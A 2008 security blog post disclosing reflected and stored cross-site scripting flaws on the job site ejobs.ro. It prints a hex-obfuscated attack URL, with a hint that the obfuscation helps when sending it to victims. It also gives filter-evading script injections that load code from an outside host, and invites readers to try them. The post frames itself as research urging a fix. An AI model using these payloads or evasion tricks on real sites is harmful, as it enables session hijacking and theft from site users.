Cognitive and Scientific Brainology

Security - consulting,assessment,research,solutions,penetration tests.
Face - detect,track,recognize,extract features,learn emotions,character animation.

eJobs.ro XSS hacks

05/07/08 | by zveriu | Categories: AskAmit, Hack

UPDATE: check the second part here

Well, this is not necessarily big news nor a breakthrough…

However, it is sad to see that big and old players on the different markets (be it job&recruitment, online payments, news corps, search engines, etc.) are still susceptible to such well known and wide-spread attacks (as XSS for example) and are still posing threat to their main and most important assets.

If to take as example ejobs.ro mainly:
- 2.5 Mil persons/month using their services
- 1 Mil resumes they posses
- 9 years of presence on the market
- No1 position on the market
All above are according to one of their banners:

ejobs.ro banner

I am asking myself - wasn’t it a good and sufficient example the compromise of intelligence assets of monster.com? :?: :no:

What is even more sad is the fact that they have some kind of filters/sanitations implemented (as you will see below). But it seems that those security measures look more like:
- are home-made ones - lacking presence of unified sanitation policy and library/package
- treat some local and specific bug/cases - lacking security/code auditing as a practice of entire SDLC
- are buggy/obsolete - they tend to be more of a burden in maintenance rather than a help for the entire software product

Let’s look at some technical details (NB: dear ejobs.ro - pay special attention :!: or contact me as we can colaborate as freelancer/consulting party )

1. XSS reflected attack.
Click link here (no harm code - only proof of concept alert box :!: ). Fully HEX obfuscated (easily deobfuscated by current editing software), but useful while sending to the victim :oops:

Code:

http://www.ejobs.ro/arhiva/jobs/%3C%42%4f%44%59%20%4f%4e%4c%4f%41%44%3D%27%61%6c%65%72%74%28%22%54%68%65%72%65%20%69%73%20%6e%6f%20%70%65%72%66%65%63%74%20%6a%6f%62%2e%4e%6f%77%20%67%65%74%20%62%61%63%6b%20%74%6f%20%77%6f%72%6b%2e%58%53%53%20%61%74%74%61%63%6b%20%65%78%70%6f%73%75%72%65%20%62%79%20%7a%76%65%72%69%75%2c%61%6e%64%72%65%69%63%6f%73%74%69%6e%2e%63%6f%6d%2e%22%29%3B%27%3E/%3C%42%4f%44%59%20%4f%4e%4c%4f%41%44%3D%27%61%6c%65%72%74%28%22%54%68%65%72%65%20%69%73%20%6e%6f%20%70%65%72%66%65%63%74%20%6a%6f%62%2e%4e%6f%77%20%67%65%74%20%62%61%63%6b%20%74%6f%20%77%6f%72%6b%2e%58%53%53%20%61%74%74%61%63%6b%20%65%78%70%6f%73%75%72%65%20%62%79%20%7a%76%65%72%69%75%2c%61%6e%64%72%65%69%63%6f%73%74%69%6e%2e%63%6f%6d%2e%22%29%3B%27%3E

XSS reflection IE

Looks like no sanitation done. Also, I always keep fighting with opposing industry colleagues that outputing user input to the title of the page (be it search, etc.) brings no benefits, rather the opposite - pain-in-the-ass :))

2. XSS stored attack.

XSS stored FF

This specific case, while doing XSS probing has shown that there are some sanitation routines… which more likely will have to be improved…

If you have an account and a resume, try either of the below injection codes in the Obiectiv or Beneficii textboxes (save and preview the CV using “Cum vad companiile CVul meu". The answer would be - “FOARTE FOARTE PROST !")

Code:

<script src="http://andreicostin.com/xss.js"</script>

Code:

	`<script`
	`src=`
	`"`
	`http://andreicostin.com/xss.js`
	`"`
	`</script >`

Both XSS attacks worked for me in IE6, IE7, FF2.

It seems that even after many decades, proper parsing is still an issue for most of the developers - be it an issue of lack of technical knowledge or just simple lack of interest to complicate themselves with additional “useless” burden of security assessment…

DISCLAIMER: this post is intended purely for security research and educative purposes as well as intended to urge the vendor to fix the problems posing threats to its customers. Any use of this information is sole responsibility of the reader and the author is not to be held liable for any miss-use of the above informative technical details.